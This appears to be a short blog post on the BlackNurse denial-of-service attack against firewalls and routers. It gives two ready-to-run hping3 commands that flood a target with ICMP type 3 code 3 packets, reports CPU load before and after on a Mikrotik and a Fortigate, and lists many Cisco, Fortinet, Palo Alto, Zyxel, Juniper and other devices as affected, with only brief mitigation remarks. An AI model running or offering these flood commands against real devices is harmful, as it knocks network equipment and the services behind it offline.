Firewall/Router Attack – BlackNurse


This BlackNurse attack will causing high CPU on target device


-Kali linux

Attack (flood better)
# hping3 -1 -C 3 -K 3 -i u20

# hping3 -1 -C 3 -K 3 –flood

-Mikrotik v6.37.1 CPU utilization before attack 4%, after attack 44%
-Fortigate 5.2 CPU utilization before attack idle 99%, after attack idle 70%

This attack only from 1 source. Could be more damage if I am using more attack sources

-Cisco ASA 5505, 5506, 5515, 5525 , 5540 (default settings)
-Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface – 100% CPU load
-Cisco ASA 5550 (Legacy) and 5515-X (latest generation)
-Cisco Router 897 – Can be mitigated – The current code from will make evil worse.
-Fortinet v5.4.1 – One CPU consumed
-Fortigate units 60c and 100D (even with drop ICMP on) – RESPONSE FROM FORTINET
-Some unverified Palo Alto – SEE ANSWER FROM PALO ALTO
-Palo Alto 5050 Firewalls with firmware 7.1.4-h2
-SonicWall – Misconfiguration can be changed and mitigated (Enable Anti-DDOS)
-Zyxel NWA3560-N (Wireless attack from LAN Side)

-Zyxel Zywall USG50

-AVM Fritz!Box 7360 (common ADSl router in Germany)
-Check Point Security Gateways – Checkpoint response!
-Cisco ISR4321 Router IOS XE – Version 15.5(3)S2, RELEASE SOFTWARE (fc2)
-GigaVUE HC-Serie (Gigamon)
-Juniper SRX
-Mikrotik CCR1036-12G-4S firmware: 3.27 (250 Mbit/sek) and no problem && RouterOS 5.4 on Mikrotik RB750
-OpenBSD 6.0 and current
-Ubiquiti Networks – EdgeRouter Lite CPU 60-70% load but still going
-Windows Firewalls

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s